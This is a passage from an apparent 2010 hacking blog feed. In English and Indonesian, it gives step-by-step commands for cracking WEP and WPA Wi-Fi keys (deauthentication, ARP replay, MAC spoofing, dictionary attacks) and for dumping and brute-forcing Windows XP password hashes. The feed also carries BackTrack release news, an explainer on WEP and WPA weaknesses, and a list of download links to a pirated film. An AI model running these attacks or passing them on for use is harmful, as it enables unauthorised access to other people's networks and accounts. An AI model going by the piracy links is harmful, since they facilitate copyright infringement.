aireplay-ng –arpreplay -b MAC_AP -h MAC_CLIENT ath0 ==> help capture information with arp attack
Console 3:
aireplay-ng –deauth 2 -c MAC_CLIENT -a MAC_AP ath0 ==> help capture information with deauth
While capture information, get the packet as far as u can because that very important to crack WEP.
Final:
aircrack-ng FILE_NAME_SAVE*.cap ==> Cracking
Wait and see the passphrase.
done.
Good Luck…

Wi-Fi Hacking – Crack WPA

noreply@blogger.com (Mr. X) — Sun, 7 Feb 2010 19:36:00 -0800

Still using BackTrack OS. Step by step :

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c CHANNEL_NUMBER -w FILE_NAME –bssid MAC_AP ath0 [Wait until shakehand packet captured]
aireplay-ng -0 1 -a MAC_AP -c MAC_CLIENT ath0
aircrack-ng -w FILE_WORD_LIST -b MAC_AP FILE_NAME*.cap
Wait and see the passphrase
done.

Good Luck…

How to Cracking WPA-PSK and WPA-2 with BackTrack 4 Beta

noreply@blogger.com (Mr. X) — Sun, 7 Feb 2010 18:40:00 -0800

The mechanics of cracking WPA is simple and straightforward, the biggest drawback is that you must have the password in your dictionary file after you capture the handshake and there must be a computer connected to the AP you want to compromise. I am using and HP Pavilion Laptop with a Raylink wireless USB antenna, I booted Bactrack 4 from CD and I am eady to begin.

First I have to stop the wireless card so I can manipulate some settings.

airmon-ng stop wlan0

(wlan0 is my wireless USB atenna), if I am usnsure what devices I have I would run

ifconfig -a

to show me all available NIC's

Now down the wireless card by typing

ifconfig wlan0 down

I am now ready to assign a fake mac address to my USB device

macchanger - - mac 00:11:22:33:44:55

I can use any mac address as long as its valid in length and characters this one is simply easy to use.

Next you must identify the bssid and channel of the AP you want to crack

airodump-ng wlan0

This will show you all AP within the range of your wireless card. The screen will look something like

BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
00:1C:58:AE:C3:01 -60 124 1 0 1 54 WPA2 CCMP PSK Network

BSSID Station PWR Rate Lost Packets Probe
00:1C:58:AE:C3:01 00:1B:66:AD:C6:00 -57 0- 1 48 Network

You will need the bssid and channel to proceed to the next step

airodump-ng -c 1 -w wpa1 - - bssid 00:1C:58:AE:C3:01 wlan0

This command starts monitoring traffic on the specific AP and writes the information collected to a file, in this example the file is called wpa1. This file is used in aircrack to decrypt the actual password

Now open a new shell and we are ready to caputre the handshake between a workstation and the AP.

aireplay-ng -0 10 -bssid 00:1C:58:AE:C3:01 -c 00:1C:58:AE:C3:01 wlan0

This command sends a reinjection of deauth packet to the AP and will force a new handshake between the workstation and the AP. When you capture it your airodump screen with show a message across the top saying it has the Handshake.

Now you are ready to crack the password, you can now stop both the airodump and aireplay shells and open a final new shell. By default BackTrack 4 has a dictionary file you can use though I suggest modifing it with additional passwords for a more feature rich attack. It is located under /pentest/wireless/cowpatty and is named dict. You can navigate to it using Konqueror or via command line Now in your new console type in

aircrack-ng wpa1 -w /pentest/wireless/cowpatty/dict

Now if you have the pasword in your dict file it will only take a few moments for the crack and the password to be show on screen.

Many AP now change passwords every hour others have WPA keys with very high encryption values and make it extremely difficult to crack. Bottom line if your a company and you have WPA using very high encryption values this make it almost impossible to crack unless a professional has hours and hours of time and a dict file hundreds of megabytes in size.

BackTrack 4 Pre Final – Public Release and Download

noreply@blogger.com (Mr. X) — Sun, 7 Feb 2010 18:29:00 -0800

The Remote Exploit Team is ecstatic to announce the public release of BackTrack 4 Pre Final codename “pwnsauce“. A VMWare Image of BT4 will be released in a few days. We have major changes in BackTrack, and have tried to document and summarize them as best as possible.
Check out our BackTrack Videos and Resources, our BackTrack PDF, and our “Introduction to BackTrack 4” movie.

We’ve opened up new subforums for this release. Please report bugs and suggestions
As usual, we ask that you do not link directly to our mirrored ISOs. We are trying to get a rough download count for BT4pf.
If you would like to link to our iso, please use :
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
md5sum and sha256sum can be found here, here and here. The Remote Exploit Website News page will be soon updated.
Enjoy
Remote Exploit Team
via Offensive Security – Information Security Blog » BackTrack Pre Final – Public Release and Download.

noreply@blogger.com (Mr. X) — Sun, 7 Feb 2010 18:28:00 -0800

BackTrack 4 final version is now released for security professionals. The development team has mentioned that lots of downloads have already taken place from the official site. BackTrack 4 is providing penetration testing, cyber security and most importantly cyber forensics functionalities for the concerned people. It is a fantastic tool as suggested by Perry4Law and PTLB.

BackTrack is one of the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to-date.

If you need any help feel free to contact its “Forum” or check its “how to” segment or its “FAQ” segment. If you need good training in these crucial areas, feel free to consult its “Training” segment. If you need any “Techno-Legal” assistance in India you must contact Perry4Law for the same. Perry4Law is India’s first and exclusive techno-legal law firm of India and one of the few in the world.

Perry4Law is also managing Perry4Law Techno-Legal Base (PTLBTM/SM). PTLB is India’s first dedicated techno-legal platform that is providing consultancy, litigation and training services in the fields of cyber law,cyber security , cyber forensics, etc. Presently, India lacks cyber forensics capabilities and PTLB is meeting this much needed requirement. PTLB is operating as a “Resource Centre for Cyber Forensics in India”.

If any person is interested in getting consultancy, litigation or training services in the field of cyber forensics in India, you may check the “Contact Point” of Perry4Law.

Tutorial Install Backtrack 4 final dual boot Windows Vista

noreply@blogger.com (Mr. X) — Wed, 20 Jan 2010 12:51:00 -0800

Backtrack 4 Final bisa di install pada windows Vista, caranya? lihat aja penjelasannya disini :

susah,sulit,mumet....pusing deh mikirin BT4 final...

Tutorial Install Backtrack 4 pree final gratis

noreply@blogger.com (Mr. X) — Wed, 20 Jan 2010 12:11:00 -0800

Penasaran dengan BT 4 Pree Final dan ingin menginstall pada Hardisk?

Lihat disini dengan jelas ( buat dulu dua partisi, partisi ext dan partisi swap ).
Tapi pada dvd Bt4 final sudah tersedia cara partisinya juga.

Semoga bermanfaat...

Tools Backtrack 4 Pre Final Release

noreply@blogger.com (Mr. X) — Wed, 20 Jan 2010 06:41:00 -0800

The team at offensive-security have been working their butts off on BT4 and the latest version is a testament to that.
I’m making room for it on my Aspire One right now. In the mean time, I loaded it up on Vbox and dug around a little to show you some of the new features. Enjoy!

Backtrack 4 APT repo

http://archive.offensive-security.com/

Backtrack 4 Pre Final Screens

Backtrack 4 Pre Final Firefox Info

User Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042523 Ubuntu/8.10 (intrepid) Firefox/3.0.11
Enabled Extensions: [2]

NoScript 1.9.3.3
Ubuntu Firefox Modifications 0.6

Disabled Extensions: [5]

Firebug 1.3.3
FoxyProxy 2.9
Greasemonkey 0.8.20090123.1
HackBar 1.3.2
Tamper Data 10.1.0

Backtrack 4 Pre Final Tutorial/Guide PDF

http://www.offensive-security.com/backtrack4-guide-tutorial.pdf

Introduction to BackTrack 4 movie

http://www.offensive-security.com/videos/backtrack-security-training-video/up-and-running-backtrack.html

Backtrack 4 Pre Final Subforum

http://forums.remote-exploit.org/backtrack-4-pre-final/

Download Backtrack 4 Pre Final Release ISO (1329MB)

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso

Hacking WEP Password

noreply@blogger.com (Mr. X) — Wed, 20 Jan 2010 01:25:00 -0800

Sebelum kita memulainya kita harus berdo'a :

Peralatan yang kita butuhkan yaitu :
1. Backtrack 3,2, atau 4Pre Final (boleh menggunakan Distro Linux Yang lainnya)
2. Komputer PC minimal pentium III 1Ghz
3. Memory 512 (Recomended)
4. VGA (Terserah) yang penting di atas 64Mb.
5. Nah yang satu ini lebih penting yaitu " Wireless Card USB/PCI" dan yang lebih penting lagi Chipset nya "Atheros dan Prism". Kenapa Atheros dan Prism?? Karena Chipset tersebut Support untuk teknik inject jaringan.

Sekarang kita mulai untuk berperang. Karena jika saya menerangkan dengan tulisan pasti akan panjang sekali. Maka dari itu saya langsung memberikan Video nya saja. Mohon di maklumi. He he he he
Ini adalah Video Hacking WEP dengan Backtrack 3 Final :
http://www.youtube.com/watch?v=WqQDqvqCYqU&feature=player_embedded

Cracking Password Windows XP Menggunakan Linux Backtrack 3 beta

noreply@blogger.com (Mr. X) — Wed, 20 Jan 2010 01:15:00 -0800

Langkah pertama yg harus anda lakukan adalah memiliki Distro Linux Backtrack (BT), dalam tutorial ini saya menggunakan BackTrack 3 beta yang dijalankan lewat USB Flashdisk, tapi anda juga dapat menggunakan BT2, hanya saja letak tool yg digunakan ada sedikit perbedaan.
Setting 1st Booting lewat USB Flashdisk/CDRom (jika menggunakan Live CD).
Jika meminta User Login masukkan user="root" pass="toor" kemudian ketik "startx".
Buka konsole (alt+f2) ketik "konsole", atau bisa langsung klik icon konsole.
Pada dasarnya File penyimpanan password terletak pada C:\WINDOWS\system32\config\SAM. File inilah yg akan kita gunakan untuk mendapatkan password Win XP.
Setelah konsole terbuka, ketik: "bkhive /mnt/sda1/WINDOWS/system32/config/system sam". Pastikan semua hardisk sudah ter-mount khusunya hardisk system Win XP. Biasanya untuk hardisk SATA, Drive C:\ Windows terletak pd /mnt/sda1 dan hardisk ATA/IDE terletak pada hda1, anda tinggal mengganti "/mnt/sda1" dengan "/mnt/hda1" atau yg lain sesuai dengan keadaan.
Ketik "samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam"
Ketik "samdump2 /mnt/sda1/WINDOWS/system32/config/SAM sam > hash.txt"
Untuk melihat file hasil hash, ketik "cat hash.txt"
Masuk ke direktori johntheripper, dengan mengetik "cd /usr/local/john-1.7.2"
Lakukan cracking password bruteforce dengan perintah "john /root/hash.txt"
Untuk mendapatkan password user tertentu menggunakan perintah "john /root/hash.txt --users=namauser" contoh: "john /root/hash.txt --users=Administrator"
Tekan Enter untuk melihat aktivitas john.
Jika semuanya berjalan lancar maka password akan segera anda dapatkan.

Jika ada kesalahan mohon dikoreksi, maklum newbie.. Selamat Mencoba...!!!

Sekilas Tentang WEP dan WPA

noreply@blogger.com (Mr. X) — Wed, 20 Jan 2010 00:40:00 -0800

Keamanan Wireless dengan metode Wired Equivalent Privacy (WEP)

WEP merupakan standart keamanan & enkripsi pertama yang digunakan pada wireless, WEP (Wired Equivalent Privacy) adalah suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication. Shared Key Authentication adalah metoda otentikasi yang membutuhkan penggunaan WEP. Enkripsi WEP menggunakan kunci yang dimasukkan (oleh administrator) ke client maupun access point. Kunci ini harus cocok dari yang diberikan akses point ke client, dengan yang dimasukkan client untuk authentikasi menuju access point, dan WEP mempunyai standar 802.11b.

Proses Shared Key Authentication:

Client meminta asosiasi ke access point, langkah ini sama seperti Open System Authentication.
Access point mengirimkan text challenge ke client secara transparan.
Client akan memberikan respon dengan mengenkripsi text challenge dengan menggunakan kunci WEP dan mengirimkan kembali ke access point.
Access point memberi respon atas tanggapan client, akses point akan melakukan decrypt terhadap respon enkripsi dari client untuk melakukan verifikasi bahwa text challenge dienkripsi dengan menggunakan WEP key yang sesuai. Pada proses ini, access point akan menentukan apakah client sudah memberikan kunci WEP yang sesuai. Apabila kunci WEP yang diberikan oleh client sudah benar, maka access point akan merespon positif dan langsung meng-authentikasi client. Namun bila kunci WEP yang dimasukkan client adalah salah, maka access point akan merespon negatif dan client tidak akan diberi authentikasi. Dengan demikian, client tidak akan terauthentikasi dan tidak terasosiasi.

WEP memiliki berbagai kelemahan antara lain :

Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
WEP menggunakan kunci yang bersifat statis
Masalah initialization vector (IV) WEP
Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.
Serangan-serangan pada kelemahan WEP antara lain :

Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyak-banyaknya. Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan
Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang lemah dalam melakukan cracking WEP.
Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.

Keamanan wireless dengan metode WI-FI Protected Accsess (WPA)

Merupakan rahasia umum jika WEP (Wired Equivalent Privacy) tidak lagi mampu diandalkan untuk menyediakan koneksi nirkabel (wireless) yang aman dari ulah orang usil atau ingin mengambil keuntungan atas apa yang kita miliki—dikenal dengan jargon hackers. Tidak lama setelah proses pengembangan WEP, kerapuhan dalam aspek kriptografi muncul.
Berbagai macam penelitian mengenai WEP telah dilakukan dan diperoleh kesimpulan bahwa walaupun sebuah jaringan wireless terlindungi oleh WEP, pihak ketiga (hackers) masih dapat membobol masuk. Seorang hacker yang memiliki perlengkapan wireless seadanya dan peralatan software yang digunakan untuk mengumpulkan dan menganalisis cukup data, dapat mengetahui kunci enkripsi yang digunakan.
Menyikapi kelemahan yang dimiliki oleh WEP, telah dikembangkan sebuah teknik pengamanan baru yang disebut sebagai WPA (WiFI Protected Access). Teknik WPA adalah model kompatibel dengan spesifikasi standar draf IEEE 802.11i. Teknik ini mempunyai beberapa tujuan dalam desainnya, yaitu kokoh, interoperasi, mampu digunakan untuk menggantikan WEP, dapat diimplementasikan pada pengguna rumahan atau corporate, dan tersedia untuk publik secepat mungkin. Adanya WPA yang "menggantikan" WPE, apakah benar perasaan "tenang" tersebut didapatkan? Ada banyak tanggapan pro dan kontra mengenai hal tersebut. Ada yang mengatakan, WPA mempunyai mekanisme enkripsi yang lebih kuat. Namun, ada yang pesimistis karena alur komunikasi yang digunakan tidak aman, di mana teknik man- in-the-middle bisa digunakan untuk mengakali proses pengiriman data. Agar tujuan WPA tercapai, setidaknya dua pengembangan sekuriti utama dilakukan. Teknik WPA dibentuk untuk menyediakan pengembangan enkripsi data yang menjadi titik lemah WEP, serta menyediakan user authentication yang tampaknya hilang pada pengembangan konsep WEP.
Teknik WPA didesain menggantikan metode keamanan WEP, yang menggunakan kunci keamanan statik, dengan menggunakan TKIP (Temporal Key Integrity Protocol) yang mampu secara dinamis berubah setelah 10.000 paket data ditransmisikan. Protokol TKIP akan mengambil kunci utama sebagai starting point yang kemudian secara reguler berubah sehingga tidak ada kunci enkripsi yang digunakan dua kali. Background process secara otomatis dilakukan tanpa diketahui oleh pengguna. Dengan melakukan regenerasi kunci enkripsi kurang lebih setiap lima menit, jaringan WiFi yang menggunakan WPA telah memperlambat kerja hackers yang mencoba melakukan cracking kunci terdahulu.
Walaupun menggunakan standar enkripsi 64 dan 128 bit, seperti yang dimiliki teknologi WEP, TKIP membuat WPA menjadi lebih efektif sebagai sebuah mekanisme enkripsi. Namun, masalah penurunan throughput seperti yang dikeluhkan oleh para pengguna jaringan wireless seperti tidak menemui jawaban dari dokumen standar yang dicari. Sebab, masalah yang berhubungan dengan throughput sangatlah bergantung pada hardware yang dimiliki, secara lebih spesifik adalah chipset yang digunakan. Anggapan saat ini, jika penurunan throughput terjadi pada implementasi WEP, maka tingkat penurunan tersebut akan jauh lebih besar jika WPA dan TKIP diimplementasikan walaupun beberapa produk mengklaim bahwa penurunan throughput telah diatasi, tentunya dengan penggunaan chipset yang lebih besar kemampuan dan kapasitasnya.
Proses otentifikasi WPA menggunakan 802.1x dan EAP (Extensible Authentication Protocol). Secara bersamaan, implementasi tersebut akan menyediakan kerangka kerja yang kokoh pada proses otentifikasi pengguna. Kerangka-kerja tersebut akan melakukan utilisasi sebuah server otentifikasi terpusat, seperti RADIUS, untuk melakukan otentifikasi pengguna sebelum bergabung ke jaringan wireless. Juga diberlakukan mutual authentification, sehingga pengguna jaringan wireless tidak secara sengaja bergabung ke jaringan lain yang mungkin akan mencuri identitas jaringannya.
Mekanisme enkripsi AES (Advanced Encryption Standard) tampaknya akan diadopsi WPA dengan mekanisme otentifikasi pengguna. Namun, AES sepertinya belum perlu karena TKIP diprediksikan mampu menyediakan sebuah kerangka enkripsi yang sangat tangguh walaupun belum diketahui untuk berapa lama ketangguhannya dapat bertahan.

Free Download Movie 2012 the movie

noreply@blogger.com (Mr. X) — Tue, 19 Jan 2010 23:19:00 -0800

Free Download Movie 2012 the movie

2012 2009 HQ TeleSync LiNE XViD READNFO-FUSION
INFO : http://www.imdb.com/title/tt1190080/
Genre: Action | Drama | Thriller
Directed by: Roland Emmerich
Starring: John Cusack, Chjwetel Ejiofor, Amanda Peet, Oliver Platt

Never before has a date in history been so significant to so many cultures, so many religions, scientists, and governments. A global cataclysm brings an end to the world and tells of the heroic struggle of the survivors. Centuries ago, the Maya left us their calendar, with a clear end date and all that it implies. By 2012, we’ll know — we were warned.

[ Check Download Links ]

http://hotfile.com/dl/17883265/50fa5ff/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part1.rar.html
http://hotfile.com/dl/17883606/cd0e395/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part2.rar.html
http://hotfile.com/dl/17883943/cf8fed0/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part3.rar.html
http://hotfile.com/dl/17884196/162e637/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part4.rar.html
http://hotfile.com/dl/17884524/c5aca66/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part5.rar.html
http://hotfile.com/dl/17884874/3d37e8a/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part6.rar.html
http://hotfile.com/dl/17885212/9c58840/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part7.rar.html
http://hotfile.com/dl/17885221/66928d0/2012.2009.HQ.TeleSync.LiNE.XViD.READNFO-FUSION.part8.rar.html